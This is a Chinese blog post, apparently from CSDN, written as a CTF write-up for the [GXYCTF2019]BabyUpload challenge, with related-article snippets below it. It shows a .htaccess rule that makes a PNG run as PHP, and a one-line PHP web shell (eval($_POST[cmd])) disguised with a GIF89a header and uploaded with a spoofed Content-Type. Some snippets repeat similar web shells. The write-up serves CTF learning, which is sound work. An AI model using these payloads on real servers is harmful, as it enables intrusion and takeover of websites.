【学习笔记 41】 buu [GXYCTF2019]BabyUpload

最新推荐文章于 2024-05-19 14:29:37 发布
最新推荐文章于 2024-05-19 14:29:37 发布
阅读量517 收藏 1
点赞数 1
分类专栏: 文件上传 ctf 学习笔记 文章标签: php 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107743519
版权
学习笔记 同时被 3 个专栏收录
50 篇文章 1 订阅
订阅专栏
ctf
47 篇文章 1 订阅
订阅专栏
文件上传
3 篇文章 0 订阅
订阅专栏

0x00 知识点

  1. .htaccess文件上传绕过

0x01 知识点详解

  1. 请参考我上一篇学习笔记

0x02 解题思路

  1. 在这里插入图片描述一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。
  2. 继续尝试利用.htaccess文件上传,首先上传一个.htaccess文件
<FilesMatch "flag.png">
 SetHandler application/x-httpd-php
</FilesMatch>

这里注意,这道题不知道为什么,我这里只有用将一句话木马后缀改成png的时候才能用菜刀之类的连上,jpg后缀都不行。这里抓包上传的时候要注意修改Content-Type: image/jpeg在这里插入图片描述
在这里插入图片描述
上传成功后,会返回上传的路径
之后上传flag.png文件,由于文件内容会过滤<?所以
就用js引用php绕过。

GIF89a
<script language='php'>eval($_POST[cmd]);</script>

同样上传抓包,将Content-Type修改为Content-Type: image/jpeg
在这里插入图片描述在这里插入图片描述
访问一下,发现访问成功,直接用蚁剑连接,flag在根目录里
在这里插入图片描述

Noslpum
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3413
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了题目页面的网址 我突然觉得我有希望了! 随后果然发现了题目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
[GXYCTF2019]BabyUpload1
qq_64201116的博客
05-14 2899
小小的文件上传,拿下!
BUUCTF---web---[GXYCTF2019]BabyUpload
2201_75556700的博客
05-19 153
4、上传包含该内容的test.txt,之后bp抓包修改文件名为.htaccess。2、上传php提示不能上传ph后缀,直接上传正常格式的图片提示太露骨了。5、利用重放器发送修改后的内容,发现成功上传了,放行。3、这里可以利用.htaccess进行绕过。6、接下来上传一句话木马test1.jpg。8、页面没有提示是图片错误,用蚁剑链接。
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 873
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 841
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1559
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 725
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
Python学习手册(第4版)
02-24
很不错的python入门学习书籍,高清带书签。该书2011年出版,python3语法格式,作为编程0基础入门教程很合适,内容很全面
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1896
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 595
BUUCTF的wp
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 605
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
[GXYCTF2019]BabyUpload wp
m0_55185160的博客
03-21 5419
打开题目是一个普通的文件上传,首先上传一个普通的一句话木马得到 发现后缀名过滤了ph,所以我们上传一个图片马 上传类型也受限制了,所以把数据类型改为image/ipeg 诶这里说明它检测的是文本的内容, ...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值